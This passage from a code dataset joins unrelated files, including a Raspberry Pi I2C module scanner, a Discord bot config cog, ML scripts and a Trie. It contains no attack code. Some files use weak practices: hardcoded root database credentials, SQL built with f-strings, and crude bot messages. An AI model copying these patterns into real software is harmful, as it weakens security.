statusI2C=1\n if kanal==0:\n if adresse==0x20:\n statIN0[0]=wertA\n statIN0[1]=wertB\n if adresse==0x21:\n statIN0[2]=wertA\n statIN0[3]=wertB\n if adresse==0x22:\n statIN0[4]=wertA\n statIN0[5]=wertB\n if adresse==0x23:\n statIN0[6]=wertA\n statIN0[7]=wertB\n\n if kanal==1:\n if adresse==0x20:\n statIN1[0]=wertA\n statIN1[1]=wertB\n if adresse==0x21:\n statIN1[2]=wertA\n statIN1[3]=wertB\n if adresse==0x22:\n statIN1[4]=wertA\n statIN1[5]=wertB\n if adresse==0x23:\n statIN1[6]=wertA\n statIN1[7]=wertB\n\n if kanal==2:\n if adresse==0x20:\n statIN2[0]=wertA\n statIN2[1]=wertB\n if adresse==0x21:\n statIN2[2]=wertA\n statIN2[3]=wertB\n if adresse==0x22:\n statIN2[4]=wertA\n statIN2[5]=wertB\n if adresse==0x23:\n statIN2[6]=wertA\n statIN2[7]=wertB\n statusI2C=1\n \n \n \n\ndef modulSuche():\n global statusI2C\n global aOut0, aOut1, aOut2,aPWM0,aPWM1,aPWM2,aIN0,aIN1,aIN2,aANA0,aANA1,aANA2,aRGBW0,aRGBW1,aRGBW2\n #Daten löschen:\n aOut0 =[]\n aOut1 =[]\n aOut2 =[]\n aPWM0 =[]\n aPWM1 =[]\n aPWM2 =[]\n aIN0 =[]\n aIN1 =[]\n aIN2 =[]\n aANA0 =[]\n aANA1 =[]\n aANA2 =[] \n aRGBW0 =[]\n aRGBW1 =[]\n aRGBW2 =[]\n if _check_i2c() == False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n for kanalSearch in range(3): \n log(\"Suche Bus: {0} Kanal: {1}\".format(bus,kanalSearch))\n plexer.channel(mux,kanalSearch)\n tmpIN=\"\"\n tmpOut=\"\"\n tmpRGBW=\"\"\n tmpPWM=\"\"\n tmpUnb=\"\"\n tmpANA=\"\"\n for device in range(128):\n try:\n plexer.bus.read_byte(device)\n if device!=mux and device!=oneWire:\n if device>=0x20 and device <=0x23:\n log(\"GeCoS 16 In : Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n tmpIN=tmpIN+hex(device)+\";\"\n if kanalSearch==0:\n aIN0.append(device)\n elif kanalSearch==1:\n aIN1.append(device)\n elif kanalSearch==2:\n aIN2.append(device)\n statusI2C=1\n set_input_konfig(kanalSearch,device)\n if _check_i2c() == False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"IN\")\n befehl+=\"}\"\n sendUDP(befehl)\n elif device>=0x24 and device <=0x27:\n log(\"GeCoS 16 OUT: Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n tmpOut=tmpOut+hex(device)+\";\"\n if kanalSearch==0:\n aOut0.append(device)\n elif kanalSearch==1:\n aOut1.append(device)\n elif kanalSearch==2:\n aOut2.append(device)\n statusI2C=1\n set_output_konfig(kanalSearch,device)\n if _check_i2c() == False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"OUT\")\n befehl+=\"}\"\n sendUDP(befehl)\n elif device>=0x50 and device <=0x57:\n log(\"GeCoS 16 PWM: Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n tmpPWM=tmpPWM+hex(device)+\";\"\n if kanalSearch==0:\n aPWM0.append(device)\n elif kanalSearch==1:\n aPWM1.append(device)\n elif kanalSearch==2:\n aPWM2.append(device)\n statusI2C=1\n set_pwm_konfig(kanalSearch,device)\n if _check_i2c() == False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"PWM\")\n befehl+=\"}\"\n sendUDP(befehl)\n elif device>=0x58 and device <=0x5f:\n log(\"GeCoS 16 RGBW: Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n tmpRGBW=tmpRGBW+hex(device)+\";\"\n if kanalSearch==0:\n aRGBW0.append(device)\n elif kanalSearch==1:\n aRGBW1.append(device)\n elif kanalSearch==2:\n aRGBW2.append(device)\n statusI2C=1\n set_pwm_konfig(kanalSearch,device)\n if _check_i2c() == 
False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"RGBW\")\n befehl+=\"}\"\n sendUDP(befehl)\n elif device>=0x68 and device <=0x6b:\n log(\"GeCoS Analog4: Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n tmpANA=tmpANA+hex(device)+\";\"\n if kanalSearch==0:\n aANA0.append(device)\n elif kanalSearch==1:\n aANA1.append(device)\n elif kanalSearch==2:\n aANA2.append(device)\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"ANA\")\n befehl+=\"}\"\n sendUDP(befehl)\n else:\n tmpUnb=tmpUnb+hex(device)+\";\"\n log(\"GeCoS Unbekanntes Gerät: Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"UNB\")\n befehl+=\"}\"\n sendUDP(befehl)\n except:\n pass\n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'GECOS16IN',tmpIN)\n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'GECOS16OUT',tmpOut)\n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'UNBEKANNT',tmpUnb) \n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'GECOS16PWM',tmpPWM) \n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'GECOSANA4',tmpANA) \n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'GECOS16RGBW',tmpRGBW) \n statusI2C=1\n \ndef bit_from_string(string, index):\n i=int(string)\n return i >> index & 1\n\nif __name__ == '__main__':\n #Konfig Werte MCP:\n log(\"Script gestartet\",\"ERROR\")\n bus=1 # 0 for rev1 boards etc.\n mux=0x71\n oneWire=0x18\n kanal=0\n bankAKonfig=0x00\n bankBKonfig=0x01\n outputKonfig=0x00\n inputKonfig=0xFF\n IOCONA=0x0A\n IOCONB=0x0B\n DEFVALA=0x06\n DEFVALB=0x07\n INTCONA=0x08\n INTCONB=0x09\n GPPUA=0x0C\n GPPUB=0x0D\n IPOLA=0x02\n IPOLB=0x03\n GPINTENA=0x04\n GPINTENB=0x05 \n intBankA=0x0E\n intBankB=0x0F\n intcapA=0x10\n intcapB=0x11\n gpioA=0x12\n gpioB=0x13\n bankA=0x14\n bankB=0x15\n aOutHex = [0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80]\n #Konfig: \n miniServerIP=\"192.168.178.28\"\n miniServerPort=8000\n #paketLaenge=1024\n freqStd=100\n \n #Interrupt Ports:\n intKanal0=17\n intKanal1=18\n intKanal2=27\n \n #Config lesen:\n configSchreiben('Allgemein','x','x')\n \n #Interrupt routine GeCoS 16 IN -> in Schleife geändert\n #GPIO.setmode(GPIO.BCM)\n #Kanal0\n #GPIO.setup(intKanal0,GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n #GPIO.add_event_detect(intKanal0, GPIO.FALLING, callback=thread_interrupt, bouncetime = 5)\n #Kanal1\n #GPIO.setup(intKanal1,GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n #GPIO.add_event_detect(intKanal1, GPIO.FALLING, callback=thread_interrupt, bouncetime = 5)\n #Kanal2\n #GPIO.setup(intKanal2,GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n #GPIO.add_event_detect(intKanal2, GPIO.FALLING, callback=thread_interrupt, bouncetime = 5)\n\n #MUX initialisieren:\n log(\"Bus:\" + str(bus) + \" Kanal:\" + str(kanal))\n plexer = multiplex(bus)\n plexer.channel(mux,kanal)\n time.sleep(0.01)\n modulSuche()\n log(datetime.now())\n log(\"UDP Port: {0}\".format(miniServerPort))\n\n #TCP Socket:\n tcpSocket=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Internet, UDP\n tcpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\n tcpSocket.bind((\"0.0.0.0\",miniServerPort))\n tcpSocket.listen(5)\n thread_gecosOut()\n\n\n #RTC Lesen:\n plexer.channel(mux,3) \n ds = DS1307(bus, 0x68)\n rtctime = ds.read_datetime()\n temp = ds.read_temp()\n print (\"DS3231 Date: {0} Temp: {1} 
\".format(rtctime.strftime(\"%d.%m.%Y %H:%M:%S\"),str(temp)))\n while True:\n #Alle eingänge lesen\n time.sleep(0.01)\n #Schleife für Eingang Lesen:\n for device in aIN0:\n try:\n kanal=0\n read_input(kanal,device)\n except:\n statusI2C=1\n pass\n for device in aIN1:\n try:\n kanal=1\n read_input(kanal,device)\n except:\n statusI2C=1\n pass\n for device in aIN2:\n try:\n kanal=2\n read_input(kanal,device)\n except:\n statusI2C=1\n pass\n","sub_path":"Symcon.py","file_name":"Symcon.py","file_ext":"py","file_size_in_byte":54619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"534519699","text":"\n# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Copyright (c) Open-MMLab. All rights reserved. \n_base_ = 'mask_rcnn_r50_fpn_syncbn-all_rpn-2conv_ssj_32x2_270k_coco.py'\n\n# lr steps at [0.9, 0.95, 0.975] of the maximum iterations\nlr_config = dict(\n warmup_iters=500, warmup_ratio=0.067, step=[81000, 85500, 87750])\n# 90k iterations with batch_size 64 is roughly equivalent to 48 epochs\nrunner = dict(type='IterBasedRunner', max_iters=90000)\n","sub_path":"PyTorch/dev/cv/detection/YOLOX_ID2833_for_PyTorch/configs/simple_copy_paste/mask_rcnn_r50_fpn_syncbn-all_rpn-2conv_ssj_32x2_90k_coco.py","file_name":"mask_rcnn_r50_fpn_syncbn-all_rpn-2conv_ssj_32x2_90k_coco.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"338199214","text":"import pymysql as mysql \nimport pandas as pd\nimport numpy as np \nfrom dateutil import parser\nconn = mysql.connect(host='127.0.0.1', port=10002, user='root', passwd='root', db='pe')\ncursor=conn.cursor()\nsql=\"SHOW TABLES\"\ncursor.execute(sql)\ntable=cursor.fetchall()\nfor i in table:\n\tif i[0] == 'order' or i[0] =='auth_item':\n\t\tcontinue\n\telse:\n\t\tsql=\"SELECT * FROM \"+i[0] \n\tdf = pd.read_sql(sql, con=conn)\n\tif set(['updated_at','created_at']).issubset(df.columns):\n\t\tminima=2000000\n\t\tcreated_at=df['created_at']\n\t\tupdated_at=df['updated_at']\n\t\tfor k in range(len(created_at)):\n\t\t\tif created_at[k] is None or updated_at[k] is None or created_at[k]=='0000-00-00 00:00:00' or updated_at[k]=='0000-00-00 00:00:00':\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tif minima > (updated_at[k]-created_at[k]).seconds :\n\t\t\t\t\tminima= (updated_at[k]-created_at[k]).seconds \n\t\tif minima > 1000 :\n\t\t\tprint(i[0])\n\t\t\n\n\n\t\t\t\t\n\n\t\t\n\t\t\n","sub_path":"ttl.py","file_name":"ttl.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"90691668","text":"\"\"\"\r\n\n\nLuke Skywalker has family and friends. Help him remind them who is who. 
Given\na string with a name, return the relation of that person to Luke.\n\nPerson| Relation \n---|--- \nDarth Vader| father \nLeia| sister \nHan| brother in law \nR2D2| droid \n \n### Examples\n\n relation_to_luke(\"Darth Vader\") ➞ \"Luke, I am your father.\"\n \n relation_to_luke(\"Leia\") ➞ \"Luke, I am your sister.\"\n \n relation_to_luke(\"Han\") ➞ \"Luke, I am your brother in law.\"\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\nrelation_to_luke=lambda n:'Luke, I am your %s.'%{'D':'father','L':'sister','H':'brother in law','R':'droid'}[n[0]]\n\n","sub_path":"8pDH2SRutPoaQghgc_3.py","file_name":"8pDH2SRutPoaQghgc_3.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"435237193","text":"#All credit to ShaneLynn.com for the datasets\n# They have been cloned to the\n# Goal: Clean up the datasets, do any necessary joins or merges, look at descriptive stats, then run a a one-way ANOVA \n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statsmodels.formula.api import ols\nimport statsmodels.api as sm\n\n\n\nusers = pd.read_csv('Datasets/user_usage.csv')\ndevice = pd.read_csv('Datasets/user_device.csv')\n##andro = pd.read_csv('Datasets/android_devices.csv')\n\nusers['use_id'].isin(device.use_id).value_counts()\n#check if values in users use_id column are present in device use_id column\n\ndevice['use_id'].isin(users['use_id']).value_counts()\n#what about the other way around?\n\n#Merge users and devices\nuser_device = pd.merge(users,device [['use_id', 'platform', 'device']],\non = 'use_id', how = 'left') #merge of the left dataset, right dataset responsible for providing null columns\nuser_device.head()\n\n\n###\nuser_device['device'].value_counts()\n#So we have potential groups here but Device Types are labelled too specifically\n#let's see if we can't use apply and functions to clean it up\n\n\n#custom function for cleaning up NANs and replace with Uknown for categorical data\ndef clean(value) :\n if isinstance(value, float) and value is np.nan :\n return \"Unknown\"\n else:\n return value\n\n#function for reducing the granularity of Devices, collapsing accoring to brands.\n\ndef collapse(value):\n if (value.lower().startswith(\"moto\")):\n return \"Motorola\"\n elif (value.lower().startswith(\"iphone\")):\n return \"Apple\"\n elif (value.lower(). startswith(\"one\")):\n return \"OnePlus\"\n elif (value.lower(). startswith(\"htc\")):\n return \"HTC\"\n elif (value.lower(). startswith(\"hua\") or value.lower(). startswith(\"eva\") ):\n return \"Huawei\"\n elif (value.lower(). startswith(\"lg\") or value.lower(). startswith(\"nexus\") ):\n return \"LG\"\n elif (value.lower(). startswith(\"lenovo\")):\n return \"Lenovo\"\n elif (value.lower(). startswith(\"vf\") or value.lower(). 
startswith(\"voda\")):\n        return \"Vodafone\"\n    elif (value.lower().startswith(\"gt\") or value.lower().startswith(\"sm\")):\n        return \"Samsung\"\n    elif (value[1:].isdigit()):\n        return \"Sony\"\n    else :\n        return value\n\nuser_device['device'] = user_device['device'].apply(clean)\n\n#Let's check if we've removed all the NANs\nuser_device['device'].value_counts(dropna = False)\n#Yes we have\n\n#Now let's clean up the devices, organizing them by Brands\nuser_device['device'] = user_device['device'].apply(collapse)\nuser_device.device.value_counts(dropna = False)\n\n\n####ANOVA:\n##H0: There is no significant difference between devices and outgoing minutes\n##Let's get a descriptive summary of the target column 'out-going minutes', but first let's make life easier and rename wordy columns\n\nuser_device.rename(columns = {'outgoing_mins_per_month': 'out_min', 'outgoing_sms_per_month' : 'out_sms' }, inplace = True )\n\nnp.mean(user_device['out_min'])\nnp.median(user_device['out_min'])\nnp.std(user_device['out_min'])\n\n##There might be some outliers given the difference between median and mean\n##let's visualize\ny = user_device['out_min']\nx = user_device.use_id\ny_std = np.std(y)\noutliers = user_device[np.abs(user_device['out_min'] -user_device['out_min'].mean()) > 3 * np.std(user_device['out_min']) ]\nplt.title(\"Outgoing Minutes - Showing Outliers\")\nplt.ylabel(\"Outgoing minutes\")\nplt.xlabel(\"User ID\")\nplt.scatter(x, y, c = 'c', marker = 'X')\nplt.scatter(outliers.use_id, outliers['out_min'], c = 'r', marker = 'X', s = 75)\nplt.show()\n\n### The outliers are those users with outgoing minutes above 1200. Let's drop them.\nuser_device = user_device[user_device.out_min <1200]\n\nuser_device[['out_min', 'device']].groupby('device').size()\n\n#some of these groups are quite small so the residuals may not meet ANOVA assumptions\n#which may have an effect on the robustness of the ANOVA test\n#So let's run ANOVA on larger groups of known brands, those with counts closer to 20\n\nmodel = ols('out_min ~ C(device)', user_device).fit()\ntable = sm.stats.anova_lm(model, typ=2)\nprint(table)\n#So there seems to be a statistically significant difference between the device/brands. However,\n#the caveat is that some groups are small, so it may affect the robustness of the test.\n","sub_path":"Stat_Analysis_Anova/ANOVA.py","file_name":"ANOVA.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} {"seq_id":"631104031","text":"class Trie_Node(object):\n    '''\n    implements a Trie Node\n    '''\n    def __init__(self):\n        self.children = [None] * 26\n        self.is_end = False\n\nclass Trie(object):\n    '''\n    implements a Trie data structure\n    '''\n    def __init__(self):\n        self.root = self.get_node()\n\n    def get_node(self):\n        '''\n        return a Trie_Node initialized to Null\n        '''\n        return Trie_Node()\n\n    def _char_to_index(self, ch):\n        '''\n        return index of ch in alphabet\n        '''\n        if ch.isupper():\n            return ord(ch) - ord(\"A\")\n        else:\n            return ord(ch) - ord(\"a\")\n\n    def insert(self, word):\n        curr = self.root\n        for ch in word:\n            indx = self._char_to_index(ch)\n            if not curr.children[indx]:\n                curr.children[indx] = self.get_node()\n            curr = curr.children[indx]\n        curr.is_end = True\n\n\n    def search(self, word):\n        curr = self.root\n        for ch in word:\n            indx = self._char_to_index(ch)\n            if not curr.children[indx]:\n                return False\n            curr = curr.children[indx]\n        return curr != None and curr.is_end\n\ntest = Trie()\ndicts= [\"the\",\"a\",\"there\",\"anaswe\",\"any\",\"by\",\"their\"]\noutput = [\"Not present in trie\", \"Present in trie\"]\n\nfor d in dicts:\n    test.insert(d)\n\nprint(\"{} ----- {}\".format(\"any\", output[test.search(\"any\")]))\nprint(\"{} ----- {}\".format(\"he\", output[test.search(\"the\")]))\nprint(\"{} ----- {}\".format(\"raj\", output[test.search(\"raj\")]))\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Miscellaneous/Trie3.py","file_name":"Trie3.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} {"seq_id":"391010452","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\ndef visualize(w, rows):\n    w = np.reshape(w, [rows, 8, 8])\n\n    plt.figure()\n\n    for i in range(rows):\n        plot = plt.subplot(1, rows, i + 1)\n        plt.axis('off')\n        # From piazza\n        plt.imshow(w[i], cmap=plt.cm.gray, vmin=0.5 * w.min(), vmax=0.5 * w.max())\n        # Remove spacing between the images\n        plt.subplots_adjust(wspace=0, hspace=0)\n\nif __name__ == '__main__':\n    # Load the tinymnist dataset\n    with np.load(\"tinymnist.npz\") as data:\n        trainData, trainTarget = data['x'], data['y']\n        testData, testTarget = data['x_test'], data['y_test']\n        validData, validTarget = data['x_valid'], data['y_valid']\n\n    tf.set_random_seed(521)\n\n    x = tf.placeholder(tf.float32)\n    y = tf.placeholder(tf.float32)\n\n    for K in range(4, 5):\n        D = trainData.shape[1]\n        learning_rate = 0.05\n\n        # Variables\n        average = tf.reduce_mean(x, 0)\n        mean = tf.Variable(tf.random_normal([D], dtype=tf.float32))\n        # The mean must be between 0 and 1\n        mean = tf.sigmoid(mean)\n        psi = tf.Variable(tf.random_normal([D], dtype=tf.float32))\n        # Psi must be a diagonal matrix with positive eigenvalues\n        psi = tf.diag(tf.exp(psi))\n        W = tf.Variable(tf.random_normal([D, K], dtype=tf.float32))\n\n        # Calculate psi + WW^T.\n        # This is a Tensor of shape [D, D]\n        matrix = psi + tf.matmul(W, tf.transpose(W))\n        # Calculate the log determinant of this matrix using Cholesky decomposition\n        log_det = 2.0 * tf.reduce_sum(tf.log(tf.diag_part(tf.cholesky(matrix))))\n\n        # Calculate the (x - mean)^T * (matrix) * (x - mean) term\n        # This is a Tensor of shape [B]\n        log_exp = -tf.reduce_sum((x - 
mean) * tf.reduce_sum(tf.matrix_inverse(matrix) * tf.expand_dims(x - mean, 1), -1), -1) / 2\n\n        # Calculate the log marginal likelihood from each term\n        # This is a Tensor of shape [B]\n        log_marginal_likelihood = tf.reduce_sum(-D / 2 * tf.log(2 * math.pi) - log_det / 2 + log_exp)\n\n        loss = -log_marginal_likelihood\n\n        optimizer = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.99, epsilon=1e-5).minimize(loss)\n\n        sess = tf.InteractiveSession()\n        init = tf.global_variables_initializer()\n        sess.run(init)\n\n        losses = []\n        for j in range(200):\n            print(j)\n            _, current_loss = sess.run([optimizer, loss], feed_dict={ x:trainData, y:trainTarget })\n            losses.append(current_loss)\n\n        print(\"Training log marginal likelihood: \" + str(sess.run(log_marginal_likelihood, feed_dict={ x:trainData, y:trainTarget })))\n        print(\"Testing log marginal likelihood: \" + str(sess.run(log_marginal_likelihood, feed_dict={ x:testData, y:testTarget })))\n        print(\"Validation log marginal likelihood: \" + str(sess.run(log_marginal_likelihood, feed_dict={ x:validData, y:validTarget })))\n\n        plt.figure()\n        plt.plot(losses)\n        plt.title('Loss vs. Number of Updates k=' + str(K))\n\n        visualize(sess.run(tf.transpose(W)), K)\n        visualize(sess.run(mean, feed_dict={ x:trainData, y:trainTarget }), 1)\n        visualize(sess.run(average, feed_dict={ x:trainData, y:trainTarget }), 1)\n        plt.show()\n","sub_path":"part3_1_2.py","file_name":"part3_1_2.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} {"seq_id":"31895739","text":"import discord\nfrom discord.ext import commands\nimport aiosqlite\n\nclass Config(commands.Cog):\n    def __init__(self, client):\n        self.client = client\n\n    async def check_blacklist(self, id):\n        db = await aiosqlite.connect('./bot/db/config.db')\n        cursor = await db.cursor()\n        \n        await cursor.execute(f\"SELECT id FROM blacklist WHERE id = {id}\")\n        result = await cursor.fetchone()\n\n        await db.close()\n        await cursor.close()\n\n        if result is None:\n            return False\n        \n        else:\n            return True\n\n    async def check_ff(self, guild):\n        db = await aiosqlite.connect('./bot/db/config.db')\n        cursor = await db.cursor()\n        await cursor.execute(f\"SELECT familyfriendly FROM config WHERE guild_id = {guild.id}\")\n        check = await cursor.fetchone()\n        if check == None:\n            await cursor.execute(f\"SELECT guild_id FROM config WHERE guild_id = {guild.id}\")\n            check0 = await cursor.fetchone()\n            if check0 is None:\n                await cursor.execute(f\"INSERT INTO config (guild_id, familyfriendly) VALUES ({guild.id}, 0)\")\n            else:\n                await cursor.execute(f\"UPDATE config SET familyfriendly = 0 WHERE guild_id = {guild.id}\")\n            await db.commit()\n            await cursor.close()\n            await db.close() \n            return \"Inactive\"\n        if check[0] == 1: \n            return \"Active\"\n        elif check[0] == 0:\n            return \"Inactive\" \n        elif check[0] == 2:\n            return \"fuf\"\n\n    @commands.group(invoke_without_command=True, disabled=True)\n    async def config(self, ctx):\n        embed = discord.Embed(title=\"Configuration Settings\", colour=discord.Colour.gold())\n        embed.add_field(name=\"Family Friendly Mode\", value=f\"Status: {await self.check_ff(ctx.guild)}\\n \"\n        \"DISCLAIMER: Family friendly mode does not apply to the bot's AI function.\")\n        await ctx.send(embed=embed)\n    \n    @config.command(disabled=True)\n    async def ff(self, ctx, mode):\n        db = await aiosqlite.connect('./bot/db/config.db')\n        cursor = await db.cursor()\n        status = await self.check_ff(ctx.guild)\n        if mode in (\"activate\", \"on\"):\n            if status == \"Active\":\n                await ctx.send(\"Family friendly mode is already active!\")\n            else:\n                await cursor.execute(f\"UPDATE config SET familyfriendly = 1 WHERE guild_id = {ctx.guild.id}\")\n                await ctx.send(\"Family friendly mode now active!\")\n        elif mode == \"deactivate\":\n            if status == \"Inactive\":\n                await ctx.send(\"Family friendly mode is already inactive!\")\n            else:\n                await cursor.execute(f\"UPDATE config SET familyfriendly = 0 WHERE guild_id = {ctx.guild.id}\")\n                await ctx.send(\"Family friendly mode deactivated.\")\n        elif mode in (\"fuf\", \"off\"):\n            if status == \"fuf\":\n                await ctx.send(\"Your forgetful ass forgot that family unfriendly mode was already on.\")\n            else:\n                embed = discord.Embed(name=\"⚠YOU ARE ABOUT TO TURN ON FAMILY **UN**FRIENDLY MODE⚠\")\n                embed.add_field(name=\"What is it?\", value=\"Family unfriendly mode is a version of Conchbot in which \"\n                \"every single message has some sort of insult or other content labeled Not Safe For Work. (Curses, \"\n                \"inappropriate naming schemes, etc.)\")\n                embed.add_field(name=\"Effects:\", value=\"All of the begging command's names are now NSFW, every message \"\n                \"sent by ConchBot has inappropriate language in it, etc.\")\n                embed.add_field(name=\"ARE YOU SURE?\", value=\"After this message, you are required to send either 'yes' \"\n                \"or 'no,' the prompt being if you want to turn on family unfriendly mode or not.\")\n                embed.set_footer(text=\"You better make the right choice.\")\n                embed.set_thumbnail(url=\"https://i.imgur.com/OJwc0yL.jpeg\")\n                await ctx.send(embed=embed)\n                msg = await self.client.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)\n                if \"no\" in msg.content.lower():\n                    await ctx.send(\"Alright. No family unfriendly mode for you.\")\n                elif \"yes\" in msg.content.lower():\n                    await cursor.execute(f\"UPDATE config SET familyfriendly = 2 WHERE guild_id = {ctx.guild.id}\")\n                    await ctx.send(\"Alrighty motherfucker. Family unfriendly mode is now activated, bitch.\")\n                else:\n                    await ctx.send(\"Invalid answer.\")\n        else:\n            await ctx.send(\"Invalid argument. 
Your argument should either be `activate`,`deactivate`, or `fuf`, or `off`, `on`.\")\n await db.commit()\n await cursor.close()\n await db.close()\n\ndef setup(client):\n client.add_cog(Config(client))","sub_path":"bot/cogs/BotConfig.py","file_name":"BotConfig.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"557293042","text":"from sklearn import linear_model\nfrom sklearn.metrics import accuracy_score\n\nfrom useful_components import TwitterDataSet, save_persistant_model\n\n\ndef support_vec_classifier_with_stochastic_gradient_descent():\n data_set = TwitterDataSet(TfIdfTransform_Bool=True)\n\n # split data set for training and testing\n X_train, X_test, y_train, y_test = data_set.get_test_train_split()\n\n classifier = linear_model.SGDClassifier(alpha=.000001, loss='hinge', # hinge is what makes it default to Support Vector Machine\n max_iter=1000, tol=1e-3)\n classifier.fit(X_train, y_train)\n y_pred = classifier.predict(X_test)\n\n print(accuracy_score(y_test, y_pred))\n\n vec_path = 'SVM_SGD_persistent_model/vectorizer.joblib'\n model_path = 'SVM_SGD_persistent_model/model.joblib'\n save_persistant_model(vec_path, model_path, classifier, data_set)\n return classifier\n\n\n\n\nsupport_vec_classifier_with_stochastic_gradient_descent()\n","sub_path":"SupportVectorClassifierWithSGD.py","file_name":"SupportVectorClassifierWithSGD.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"184167505","text":"def out(tree,start,end,a):\n if(start> 27\n```\n\n```\npython find_subsequence.py data/input_2.txt 5 differences\n>> 58\n```\n\n```\npython find_subsequence.py data/input_3.txt 30 values\n>> 44\n```\n\n```\npython find_subsequence.py data/input_3.txt 10 differences\n>> 40\n\n'''\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"Data\", type=str, help=\"The input file\")\n parser.add_argument(\"n\", type=int, help=\"The maximum length of the subsequence\")\n parser.add_argument(\"metric\", type=str, help=\"The calculation metric\")\n args = parser.parse_args()\n txtFile = open(args.Data)\n main(txtFile, args.n, args.metric)\n","sub_path":"Job_Assignments/find_subsequence.py","file_name":"find_subsequence.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"67736328","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.conf import settings \nfrom gallery.models import RedditPost, Subreddit\n\ndef index(request):\n if settings.USE_CACHE:\n # Get reddit posts and subreddits from Redis cache\n context = {'reddit_posts_by_pane': RedditPost.objects.get_all_from_cache(),\n 'subreddits': Subreddit.objects.get_all_from_cache()}\n else:\n # Get reddit posts and subreddits from SQL DB\n subreddits = Subreddit.objects.all()\n reddit_posts_by_pane = {}\n\n # Organize reddit posts by the subreddit they are from\n for subreddit in subreddits:\n reddit_posts_by_pane[subreddit.pane_name] = RedditPost.objects.select_all_with_subreddit(subreddit)\n\n context = {'reddit_posts_by_pane':reddit_posts_by_pane,\n 'subreddits': subreddits}\n\n return render(request, 'gallery.html', 
